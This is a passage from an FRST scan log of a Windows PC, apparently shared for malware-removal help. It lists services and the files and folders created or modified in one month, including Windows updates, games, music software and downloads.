S3 wfpcapture; \SystemRoot\System32\drivers\wfpcapture.sys [X]
U3 wpcsvc; no ImagePath
==================== NetSvcs (Whitelisted) ===================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
==================== One Month Created files and folders ========
(If an entry is included in the fixlist, the file/folder will be moved.)
2015-12-10 17:25 - 2015-12-10 17:25 - 02369024 _____ (Farbar) C:\Users\PimpSlap\Downloads\FRST64.exe
2015-12-10 17:25 - 2015-12-10 17:25 - 02369024 _____ (Farbar) C:\Users\PimpSlap\Desktop\FRST64.exe
2015-12-10 17:25 - 2015-12-10 17:25 - 00023624 _____ C:\Users\PimpSlap\Desktop\FRST.txt
2015-12-10 17:25 - 2015-12-10 17:25 - 00000000 ____D C:\FRST
2015-12-10 16:53 - 2015-12-10 16:53 - 00016148 _____ C:\WINDOWS\system32\PIMPSLAP-PC_PimpSlap_HistoryPrediction.bin
2015-12-09 18:20 - 2015-12-10 06:49 - 00000000 ____D C:\Users\PimpSlap\Desktop\Happy Holidays
2015-12-09 11:52 - 2015-12-09 11:54 - 00000000 ____D C:\Program Files (x86)\VS Revo Group
2015-12-09 11:51 - 2015-12-09 11:51 - 11069616 _____ (VS Revo Group ) C:\Users\PimpSlap\Downloads\RevoUninProSetup.exe
2015-12-09 11:51 - 2015-12-09 11:51 - 02623656 _____ (VS Revo Group Ltd.) C:\Users\PimpSlap\Downloads\revosetup.exe
2015-12-09 11:49 - 2015-12-09 11:49 - 00000000 ____D C:\Users\PimpSlap\Downloads\Mirillis Action! 1.29.0 Multilingual + Key [4realtorrentz]
2015-12-09 11:44 - 2015-12-09 12:04 - 00000000 ____D C:\Program Files (x86)\Mirillis
2015-12-09 11:30 - 2015-12-09 11:32 - 21627584 _____ (Mirillis Ltd.) C:\Users\PimpSlap\Downloads\action_1_29_0_setup.exe
2015-12-09 11:25 - 2015-12-09 11:25 - 21277853 _____ C:\Users\PimpSlap\Downloads\Mirillis Action! 1.29.0 Multilingual + Key [4realtorrentz].zip
2015-12-09 09:52 - 2015-12-09 09:52 - 00079174 _____ C:\Users\PimpSlap\Downloads\Cubano.zip
2015-12-09 09:28 - 2015-12-09 09:28 - 00002117 _____ C:\Users\PimpSlap\Desktop\FL Studio 11.lnk
2015-12-09 09:28 - 2015-12-09 09:28 - 00000000 ____D C:\Users\PimpSlap\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\ASIO4ALL v2
2015-12-09 09:28 - 2015-12-09 09:28 - 00000000 ____D C:\Program Files (x86)\VstPlugins
2015-12-09 09:28 - 2015-12-09 09:28 - 00000000 ____D C:\Program Files (x86)\ASIO4ALL v2
2015-12-09 09:27 - 2015-12-09 09:27 - 00000000 ____D C:\Users\PimpSlap\AppData\Roaming\FlowStone
2015-12-09 09:27 - 2015-12-09 09:27 - 00000000 ____D C:\Program Files (x86)\DSPRobotics
2015-12-09 09:16 - 2015-11-24 21:33 - 03622272 _____ (Microsoft Corporation) C:\WINDOWS\system32\iertutil.dll
2015-12-09 09:16 - 2015-11-24 21:01 - 02879024 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iertutil.dll
2015-12-09 09:16 - 2015-11-24 20:44 - 21872640 _____ (Microsoft Corporation) C:\WINDOWS\system32\edgehtml.dll
2015-12-09 09:16 - 2015-11-24 20:42 - 24592384 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll
2015-12-09 09:16 - 2015-11-24 20:34 - 12504576 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll
2015-12-09 09:16 - 2015-11-24 20:23 - 19323392 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll
2015-12-09 09:16 - 2015-11-24 20:23 - 03588096 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kfull.sys
2015-12-09 09:16 - 2015-11-24 20:22 - 01717248 _____ (Microsoft Corporation) C:\WINDOWS\system32\GdiPlus.dll
2015-12-09 09:16 - 2015-11-24 20:22 - 01383424 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kbase.sys
2015-12-09 09:16 - 2015-11-24 20:10 - 18801664 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\edgehtml.dll
2015-12-09 09:16 - 2015-11-24 20:05 - 11263488 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieframe.dll
2015-12-09 09:15 - 2015-11-30 23:01 - 02115936 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ntfs.sys
2015-12-09 09:15 - 2015-11-30 22:03 - 00008192 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\gpuenergydrv.sys
2015-12-09 09:15 - 2015-11-30 21:54 - 00771072 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakradiag.dll
2015-12-09 09:15 - 2015-11-30 21:51 - 07523840 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakra.dll
2015-12-09 09:15 - 2015-11-30 21:49 - 04792320 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9.dll
2015-12-09 09:15 - 2015-11-30 21:02 - 03580416 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9.dll
2015-12-09 09:15 - 2015-11-30 20:59 - 05455360 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakra.dll
2015-12-09 09:15 - 2015-11-24 21:42 - 04532304 _____ (Microsoft Corporation) C:\WINDOWS\explorer.exe
2015-12-09 09:15 - 2015-11-24 21:42 - 00168288 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetworkUXBroker.exe
2015-12-09 09:15 - 2015-11-24 21:41 - 01822280 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntdll.dll
2015-12-09 09:15 - 2015-11-24 21:40 - 00516448 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\USBHUB3.SYS
2015-12-09 09:15 - 2015-11-24 21:32 - 00113184 _____ (Microsoft Corporation) C:\WINDOWS\system32\userenv.dll
2015-12-09 09:15 - 2015-11-24 21:27 - 01366680 _____ (Microsoft Corporation) C:\WINDOWS\system32\user32.dll
2015-12-09 09:15 - 2015-11-24 21:12 - 04047288 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\explorer.exe
2015-12-09 09:15 - 2015-11-24 21:11 - 01532984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ntdll.dll
2015-12-09 09:15 - 2015-11-24 21:09 - 01310880 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\user32.dll
2015-12-09 09:15 - 2015-11-24 20:59 - 00092992 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\userenv.dll
2015-12-09 09:15 - 2015-11-24 20:49 - 01569280 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Globalization.dll
2015-12-09 09:15 - 2015-11-24 20:49 - 00498688 _____ (Microsoft Corporation) C:\WINDOWS\system32\WlanMediaManager.dll
2015-12-09 09:15 - 2015-11-24 20:49 - 00467456 _____ (Microsoft Corporation) C:\WINDOWS\system32\MBMediaManager.dll
2015-12-09 09:15 - 2015-11-24 20:49 - 00270336 _____ (Microsoft Corporation) C:\WINDOWS\system32\RasMediaManager.dll
2015-12-09 09:15 - 2015-11-24 20:48 - 00146944 _____ (Microsoft Corporation) C:\WINDOWS\system32\EthernetMediaManager.dll
2015-12-09 09:15 - 2015-11-24 20:48 - 00126464 _____ (Microsoft Corporation) C:\WINDOWS\system32\DAMediaManager.dll
2015-12-09 09:15 - 2015-11-24 20:37 - 02350592 _____ (Microsoft Corporation) C:\WINDOWS\system32\authui.dll
2015-12-09 09:15 - 2015-11-24 20:36 - 01710592 _____ (Microsoft Corporation) C:\WINDOWS\system32\SRHInproc.dll
2015-12-09 09:15 - 2015-11-24 20:36 - 00022528 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\usb8023.sys
2015-12-09 09:15 - 2015-11-24 20:35 - 00929792 _____ (Microsoft Corporation) C:\WINDOWS\system32\SRH.dll
2015-12-09 09:15 - 2015-11-24 20:35 - 00845824 _____ (Microsoft Corporation) C:\WINDOWS\system32\Magnify.exe
2015-12-09 09:15 - 2015-11-24 20:31 - 00121344 _____ (Microsoft Corporation) C:\WINDOWS\system32\DAMM.dll
2015-12-09 09:15 - 2015-11-24 20:30 - 00171008 _____ (Microsoft Corporation) C:\WINDOWS\system32\dot3mm.dll
2015-12-09 09:15 - 2015-11-24 20:30 - 00147968 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\rmcast.sys
2015-12-09 09:15 - 2015-11-24 20:30 - 00080896 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\hdaudbus.sys
2015-12-09 09:15 - 2015-11-24 20:29 - 01649152 _____ (Microsoft Corporation) C:\WINDOWS\system32\comsvcs.dll
2015-12-09 09:15 - 2015-11-24 20:29 - 00355328 _____ (Microsoft Corporation) C:\WINDOWS\system32\ninput.dll
2015-12-09 09:15 - 2015-11-24 20:28 - 00572928 _____ (Microsoft Corporation) C:\WINDOWS\system32\vbscript.dll
2015-12-09 09:15 - 2015-11-24 20:28 - 00523776 _____ (Microsoft Corporation) C:\WINDOWS\system32\catsrvut.dll
2015-12-09 09:15 - 2015-11-24 20:27 - 02180608 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentServer.dll
2015-12-09 09:15 - 2015-11-24 20:26 - 00849408 _____ (Microsoft Corporation) C:\WINDOWS\system32\comdlg32.dll
2015-12-09 09:15 - 2015-11-24 20:26 - 00181760 _____ (Microsoft Corporation) C:\WINDOWS\system32\shutdownux.dll
2015-12-09 09:15 - 2015-11-24 20:25 - 00324096 _____ (Microsoft Corporation) C:\WINDOWS\system32\profsvc.dll
2015-12-09 09:15 - 2015-11-24 20:25 - 00067072 _____ (Microsoft Corporation) C:\WINDOWS\system32\profext.dll
2015-12-09 09:15 - 2015-11-24 20:23 - 00587776 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieui.dll
2015-12-09 09:15 - 2015-11-24 20:22 - 00603648 _____ (Microsoft Corporation) C:\WINDOWS\system32\duser.dll
2015-12-09 09:15 - 2015-11-24 20:22 - 00007168 _____ (Microsoft Corporation) C:\WINDOWS\system32\kbdgeoqw.dll
2015-12-09 09:15 - 2015-11-24 20:22 - 00007168 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDAZST.DLL
2015-12-09 09:15 - 2015-11-24 20:22 - 00007168 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDAZEL.DLL
2015-12-09 09:15 - 2015-11-24 20:22 - 00007168 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDAZE.DLL
2015-12-09 09:15 - 2015-11-24 20:19 - 01795584 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.dll
2015-12-09 09:15 - 2015-11-24 20:19 - 00185344 _____ (Microsoft Corporation) C:\WINDOWS\system32\psmsrv.dll
2015-12-09 09:15 - 2015-11-24 20:18 - 01233920 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Globalization.dll
2015-12-09 09:15 - 2015-11-24 20:17 - 00774656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SRH.dll
2015-12-09 09:15 - 2015-11-24 20:16 - 01442816 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SRHInproc.dll
2015-12-09 09:15 - 2015-11-24 20:16 - 00786432 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Magnify.exe
2015-12-09 09:15 - 2015-11-24 20:13 - 02153984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\authui.dll
2015-12-09 09:15 - 2015-11-24 20:11 - 00296960 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ninput.dll
2015-12-09 09:15 - 2015-11-24 20:10 - 01328128 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\comsvcs.dll
2015-12-09 09:15 - 2015-11-24 20:10 - 00503296 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\vbscript.dll
2015-12-09 09:15 - 2015-11-24 20:10 - 00415744 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\catsrvut.dll
2015-12-09 09:15 - 2015-11-24 20:08 - 00749568 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\comdlg32.dll
2015-12-09 09:15 - 2015-11-24 20:07 - 00053248 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\profext.dll
2015-12-09 09:15 - 2015-11-24 20:04 - 01467392 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\GdiPlus.dll
2015-12-09 09:15 - 2015-11-24 20:04 - 00480768 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\duser.dll
2015-12-09 09:15 - 2015-11-24 20:04 - 00474624 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieui.dll
2015-12-09 09:15 - 2015-11-24 20:04 - 00007168 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\kbdgeoqw.dll
2015-12-09 09:15 - 2015-11-24 20:04 - 00007168 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\KBDAZST.DLL
2015-12-09 09:15 - 2015-11-24 20:04 - 00007168 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\KBDAZEL.DLL
2015-12-09 09:15 - 2015-11-24 20:04 - 00007168 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\KBDAZE.DLL
2015-12-09 09:15 - 2015-11-24 18:52 - 00775312 _____ C:\WINDOWS\SysWOW64\locale.nls
2015-12-09 09:15 - 2015-11-24 18:52 - 00775312 _____ C:\WINDOWS\system32\locale.nls
2015-12-09 09:13 - 2015-12-09 09:13 - 00064946 _____ C:\Users\PimpSlap\Downloads\RBNo2.zip
2015-12-09 09:11 - 2015-12-09 09:11 - 00010715 _____ C:\Users\PimpSlap\Downloads\Distant-Galaxy.zip
2015-12-08 19:19 - 2015-12-08 19:19 - 00039095 _____ C:\Users\PimpSlap\Downloads\neou.zip
2015-12-08 19:16 - 2015-12-08 19:16 - 00020186 _____ C:\Users\PimpSlap\Downloads\bebas_neue.zip
2015-12-08 19:09 - 2015-12-08 19:09 - 00053034 _____ C:\Users\PimpSlap\Downloads\batman_forever (1).zip
2015-12-07 20:23 - 2015-12-07 20:24 - 00000000 ____D C:\Users\PimpSlap\Downloads\FL Studio Producer Edition 11.0.4+Plugins Bundle R2R [ChingLiu]
2015-12-07 20:10 - 2015-12-07 20:10 - 00000000 ____D C:\Program Files\Common Files\VST2
2015-12-07 20:08 - 2015-12-09 09:27 - 00000000 ____D C:\Users\PimpSlap\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Image-Line
2015-12-07 20:08 - 2015-12-09 09:27 - 00000000 ____D C:\Program Files\Image-Line
2015-12-07 20:08 - 2015-12-07 20:08 - 00000000 ____D C:\Users\PimpSlap\Documents\Image-Line
2015-12-07 20:08 - 2015-12-07 20:08 - 00000000 ____D C:\Users\PimpSlap\AppData\Roaming\Image-Line
2015-12-07 20:08 - 2015-12-07 20:08 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Image-Line
2015-12-07 20:00 - 2015-12-09 09:27 - 00000000 ____D C:\Program Files (x86)\Image-Line
2015-12-07 19:58 - 2015-12-07 20:00 - 517121104 _____ (Image-Line) C:\Users\PimpSlap\Downloads\flstudio_12.1.3.exe
2015-12-07 19:54 - 2015-12-07 19:57 - 71607327 _____ C:\Users\PimpSlap\Downloads\TheFatRat - Windfall.mp4
2015-12-07 19:50 - 2015-12-07 19:53 - 74450897 _____ C:\Users\PimpSlap\Downloads\Jamie Berry - Out of My Mind [Electro Swing].mp4
2015-12-05 23:28 - 2015-12-05 23:28 - 88657408 _____ (by dimabal100000) C:\Users\PimpSlap\Desktop\[0.9.12] Svatekl2 Mod Pack v10.3.exe
2015-12-05 23:26 - 2015-12-05 23:27 - 88657408 _____ (by dimabal100000) C:\Users\PimpSlap\Downloads\[0.9.12] Svatekl2 Mod Pack v10.3.exe
2015-12-05 12:45 - 2015-12-06 13:10 - 00000000 ____D C:\Users\PimpSlap\Desktop\Pics
2015-12-04 15:23 - 2015-12-04 15:23 - 12079414 _____ C:\Users\PimpSlap\Downloads\MUCH WOW.ai
2015-12-02 16:53 - 2015-12-05 15:07 - 00000327 _____ C:\Users\PimpSlap\Desktop\Minecraft Cords.txt
2015-11-29 17:44 - 2015-11-29 17:44 - 36976874 _____ (Igor Pavlov) C:\Users\PimpSlap\Downloads\mcedit2-win64-2.0.0alpha-907 (1).exe
2015-11-29 17:25 - 2015-11-29 17:25 - 30716779 _____ (Igor Pavlov) C:\Users\PimpSlap\Downloads\mcedit2-win64-2.0.0alpha-823.exe
2015-11-29 17:25 - 2015-11-23 05:09 - 00000000 ____D C:\Users\PimpSlap\Downloads\mcedit2-win64-2.0.0alpha-907
2015-11-29 17:24 - 2015-11-29 17:25 - 36976874 _____ (Igor Pavlov) C:\Users\PimpSlap\Downloads\mcedit2-win64-2.0.0alpha-907.exe
2015-11-28 16:35 - 2015-11-28 16:36 - 00000000 ____D C:\Users\PimpSlap\Downloads\Underdogs.2013.DUBBED.DVDRip.x264-PHOBOS[et]
2015-11-28 13:44 - 2015-11-28 13:44 - 88363008 _____ (by dimabal100000) C:\Users\PimpSlap\Downloads\[0.9.12] svatekl2 mod pack v10.2.exe
2015-11-27 10:27 - 2015-11-27 10:28 - 03317784 _____ C:\Users\PimpSlap\Downloads\HeroesAndGenerals-setup-111463.exe
2015-11-22 18:16 - 2015-11-22 18:18 - 88240640 _____ (by dimabal100000) C:\Users\PimpSlap\Downloads\[0.9.12] Svatekl2 Mod Pack v10.1.exe
2015-11-21 16:10 - 2015-12-01 17:51 - 00000000 ____D C:\Users\PimpSlap\AppData\Roaming\CDisplayEx
2015-11-21 16:10 - 2015-11-21 16:10 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CDisplayEx
2015-11-21 16:10 - 2015-11-21 16:10 - 00000000 ____D C:\Program Files\CDisplayEx
2015-11-21 15:29 - 2015-11-21 15:29 - 07151352 _____ (Progdigy Software S.A.R.L. ) C:\Users\PimpSlap\Downloads\CDisplayExWin64v1.10.29.exe
2015-11-21 15:19 - 2015-11-21 15:19 - 00000000 ____D C:\Users\PimpSlap\Downloads\Witchking00 - Adventure Time 1-3
2015-11-21 15:17 - 2015-11-21 15:19 - 00000000 ____D C:\Users\PimpSlap\Downloads\Witchking00 - The Mystic Pokemon + DragonBall - The Lost Chapter
2015-11-21 15:17 - 2015-11-21 15:18 - 00000000 ____D C:\Users\PimpSlap\Downloads\Witchking00 - April O'Neil 1-2
2015-11-21 15:17 - 2015-11-21 15:17 - 00000000 ____D C:\Users\PimpSlap\Downloads\WitchKing00 The Red Splinter (Adventure Time)
2015-11-21 15:17 - 2015-11-21 15:17 - 00000000 ____D C:\Users\PimpSlap\Downloads\Witchking00 - The Legend of Korra 1-2
2015-11-20 16:39 - 2015-11-20 16:39 - 87617536 _____ (by dimabal100000) C:\Users\PimpSlap\Downloads\[0.9.12] Svatekl2 Mod Pack v10.0.exe
2015-11-13 11:23 - 2015-11-13 11:23 - 00001161 _____ C:\Users\PimpSlap\Desktop\Fallout4Launcher - Shortcut.lnk
2015-11-12 19:30 - 2015-11-16 16:20 - 00001135 _____ C:\Users\PimpSlap\Desktop\Fallout4 - Shortcut.lnk
2015-11-12 19:30 - 2015-11-12 19:37 - 00000000 ____D C:\Users\PimpSlap\AppData\Local\Fallout4
2015-11-12 19:23 - 2015-11-12 19:23 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Fallout 4
2015-11-12 18:56 - 2015-11-12 18:56 - 00070656 _____ C:\Users\PimpSlap\Downloads\GTAV Date Launcher.exe
2015-11-12 15:24 - 2015-11-12 15:24 - 00191787 _____ C:\Users\PimpSlap\Downloads\Unconfirmed 710115.crdownload
2015-11-12 15:23 - 2015-11-12 15:23 - 00187929 _____ C:\Users\PimpSlap\Downloads\GTA V Fixes (2).zip
2015-11-12 15:23 - 2015-11-12 15:23 - 00187929 _____ C:\Users\PimpSlap\Downloads\GTA V Fixes (1).zip
2015-11-12 15:21 - 2015-11-12 15:22 - 00187929 _____ C:\Users\PimpSlap\Downloads\GTA V Fixes.zip
2015-11-12 15:16 - 2015-11-12 16:59 - 00000000 ____D C:\Users\PimpSlap\Downloads\Fallout.4-CODEX
2015-11-12 12:32 - 2015-11-12 12:32 - 00000000 ____D C:\Users\PimpSlap\AppData\Roaming\Grand Theft Auto V
2015-11-12 12:32 - 2015-04-06 18:40 - 00002276 _____ C:\Users\PimpSlap\Desktop\Grand Theft Auto V.lnk
2015-11-11 17:10 - 2015-11-11 17:10 - 00259979 _____ C:\Users\PimpSlap\Downloads\XRay-4.4.jar
2015-11-11 16:42 - 2015-11-11 16:42 - 00004563 _____ C:\Users\PimpSlap\AppData\Roaming\CamStudio.cfg
2015-11-11 16:42 - 2015-11-11 16:42 - 00000408 _____ C:\Users\PimpSlap\AppData\Roaming\CamShapes.ini
2015-11-11 16:42 - 2015-11-11 16:42 - 00000408 _____ C:\Users\PimpSlap\AppData\Roaming\CamLayout.ini
2015-11-11 16:42 - 2015-11-11 16:42 - 00000161 _____ C:\Users\PimpSlap\AppData\Roaming\Camdata.ini
2015-11-11 16:21 - 2015-11-11 16:22 - 11438475 _____ (CamStudio Open Source ) C:\Users\PimpSlap\Downloads\CamStudio_Setup_2-7_r316 (1).exe
2015-11-11 16:19 - 2015-11-11 16:20 - 00376680 _____ (CamStudio Open Source ) C:\Users\PimpSlap\Downloads\CamStudio_Setup_2-7_r316.exe
2015-11-11 15:25 - 2015-11-11 15:45 - 287790583 _____ C:\Users\PimpSlap\Downloads\Sponge (1).zip
2015-11-11 15:16 - 2015-11-11 15:17 - 19496960 _____ C:\Users\PimpSlap\Downloads\Sponge.zip
2015-11-10 16:42 - 2015-11-10 16:42 - 00031843 _____ C:\Users\PimpSlap\Downloads\torrent
2015-11-10 16:34 - 2015-11-10 16:34 - 592570531 _____ C:\Users\PimpSlap\Downloads\Grand.Theft.Auto.V.Update.6(v1.0.372.2).and.Crack.v5-3DM.and.Crack.v1-RELOADED.rar
2015-11-10 16:20 - 2015-11-04 21:15 - 00541024 _____ (Microsoft Corporation) C:\WINDOWS\system32\mcupdate_GenuineIntel.dll
2015-11-10 16:20 - 2015-11-04 21:13 - 00577888 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\afd.sys
2015-11-10 16:20 - 2015-11-04 21:11 - 01392480 _____ (Microsoft Corporation) C:\WINDOWS\system32\LicenseManager.dll
2015-11-10 16:20 - 2015-11-04 20:56 - 01083072 _____ (Microsoft Corporation) C:\WINDOWS\system32\appraiser.dll
2015-11-10 16:20 - 2015-11-04 20:56 - 00025280 _____ (Microsoft Corporation) C:\WINDOWS\system32\CompatTelRunner.exe
2015-11-10 16:20 - 2015-11-04 20:30 - 00961376 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\LicenseManager.dll
2015-11-10 16:20 - 2015-11-04 20:18 - 03248128 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.dll
2015-11-10 16:20 - 2015-11-04 20:17 - 02418688 _____ (Microsoft Corporation) C:\WINDOWS\system32\MFMediaEngine.dll
2015-11-10 16:20 - 2015-11-04 20:10 - 02987520 _____ (Microsoft Corporation) C:\WINDOWS\system32\esent.dll
2015-11-10 16:20 - 2015-11-04 20:07 - 01068032 _____ (Microsoft Corporation) C:\WINDOWS\system32\audiosrv.dll
2015-11-10 16:20 - 2015-11-04 20:05 - 01602560 _____ (Microsoft Corporation) C:\WINDOWS\system32\urlmon.dll
2015-11-10 16:20 - 2015-11-04 19:59 - 02675200 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.StateRepository.dll
2015-11-10 16:20 - 2015-11-04 19:58 - 00627712 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.dll
2015-11-10 16:20 - 2015-11-04 19:54 - 00502272 _____ (Microsoft Corporation) C:\WINDOWS\system32\dlnashext.dll
2015-11-10 16:20 - 2015-11-04 19:42 - 02647040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.dll
2015-11-10 16:20 - 2015-11-04 19:40 - 01918976 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MFMediaEngine.dll
2015-11-10 16:20 - 2015-11-04 19:35 - 02639872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\esent.dll
2015-11-10 16:20 - 2015-11-04 19:33 - 01380864 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\urlmon.dll
2015-11-10 16:20 - 2015-11-04 19:27 - 02049536 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.StateRepository.dll
2015-11-10 16:20 - 2015-11-04 19:23 - 00441344 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dlnashext.dll
2015-11-10 16:19 - 2015-11-04 21:15 - 08020832 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntoskrnl.exe
2015-11-10 16:19 - 2015-11-04 21:14 - 00459104 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\netio.sys
2015-11-10 16:19 - 2015-11-04 21:06 - 00966416 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinapi.appcore.dll
2015-11-10 16:19 - 2015-11-04 21:01 - 00607408 _____ (Microsoft Corporation) C:\WINDOWS\system32\fontdrvhost.exe
2015-11-10 16:19 - 2015-11-04 20:56 - 00116064 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\tdx.sys
2015-11-10 16:19 - 2015-11-04 20:23 - 00762888 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinapi.appcore.dll
2015-11-10 16:19 - 2015-11-04 20:23 - 00076800 _____ (Microsoft Corporation) C:\WINDOWS\system32\browserbroker.dll
2015-11-10 16:19 - 2015-11-04 20:18 - 00539728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fontdrvhost.exe
2015-11-10 16:19 - 2015-11-04 20:12 - 00515072 _____ (Microsoft Corporation) C:\WINDOWS\system32\internetmail.dll
2015-11-10 16:19 - 2015-11-04 20:11 - 00333312 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusUpdateHandlers.dll
2015-11-10 16:19 - 2015-11-04 20:06 - 00453120 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.Usb.dll
2015-11-10 16:19 - 2015-11-04 20:05 - 00826880 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript.dll
2015-11-10 16:19 - 2015-11-04 20:03 - 01015808 _____ (Microsoft Corporation) C:\WINDOWS\system32\RDXService.dll
2015-11-10 16:19 - 2015-11-04 20:01 - 00949760 _____ (Microsoft Corporation) C:\WINDOWS\system32\kerberos.dll
2015-11-10 16:19 - 2015-11-04 20:01 - 00713216 _____ (Microsoft Corporation) C:\WINDOWS\system32\usermgr.dll
2015-11-10 16:19 - 2015-11-04 20:01 - 00579072 _____ (Microsoft Corporation) C:\WINDOWS\system32\winlogon.exe
2015-11-10 16:19 - 2015-11-04 19:55 - 00145408 _____ (Microsoft Corporation) C:\WINDOWS\system32\dssvc.dll
2015-11-10 16:19 - 2015-11-04 19:34 - 00311296 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.Usb.dll
2015-11-10 16:19 - 2015-11-04 19:33 - 00650240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript.dll
2015-11-10 16:19 - 2015-11-04 19:30 - 00767488 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\kerberos.dll
2015-11-10 16:19 - 2015-11-04 19:27 - 00464896 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.dll
==================== One Month Modified files and folders ========
(If an entry is included in the fixlist, the file/folder will be moved.)
2015-12-10 17:25 - 2015-10-30 15:15 - 00000930 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA1d11368d9c6141c.job
2015-12-10 17:25 - 2015-07-10 01:47 - 00000000 ____D C:\Windows
2015-12-10 17:25 - 2014-12-26 11:35 - 00000000 ____D C:\Program Files (x86)\Steam
2015-12-10 17:23 - 2015-03-26 19:01 - 00007608 _____ C:\Users\PimpSlap\AppData\Local\resmon.resmoncfg
2015-12-10 16:48 - 2015-07-14 20:29 - 00000000 ____D C:\Users\PimpSlap\AppData\LocalLow\Heroes and Generals
2015-12-10 16:42 - 2015-10-11 13:30 - 00000000 ____D C:\Users\PimpSlap
2015-12-10 15:25 - 2015-10-30 15:15 - 00000926 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore1d11368d9784eb7.job
2015-12-10 15:07 - 2015-07-14 15:52 - 00000000 ____D C:\Users\PimpSlap\AppData\Roaming\TS3Client
2015-12-10 14:56 - 2015-07-30 14:42 - 00000000 ___HD C:\Program Files\WindowsApps
2015-12-10 14:56 - 2015-07-30 14:42 - 00000000 ____D C:\WINDOWS\AppReadiness
2015-12-10 14:53 - 2015-07-14 16:38 - 00000000 ____D C:\WarThunder
2015-12-10 14:47 - 2015-10-11 13:46 - 00917952 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2015-12-10 14:47 - 2015-07-30 14:40 - 00000000 ____D C:\WINDOWS\INF
2015-12-10 14:47 - 2015-07-22 22:31 - 00000000 ____D C:\ProgramData\boost_interprocess
2015-12-10 14:45 - 2015-10-13 17:08 - 00050688 _____ C:\WINDOWS\system32\IngameScript.dll
2015-12-10 14:44 - 2015-07-29 17:58 - 00005120 _____ C:\WINDOWS\system32\_StatLogic
2015-12-10 14:40 - 2015-07-30 13:52 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT
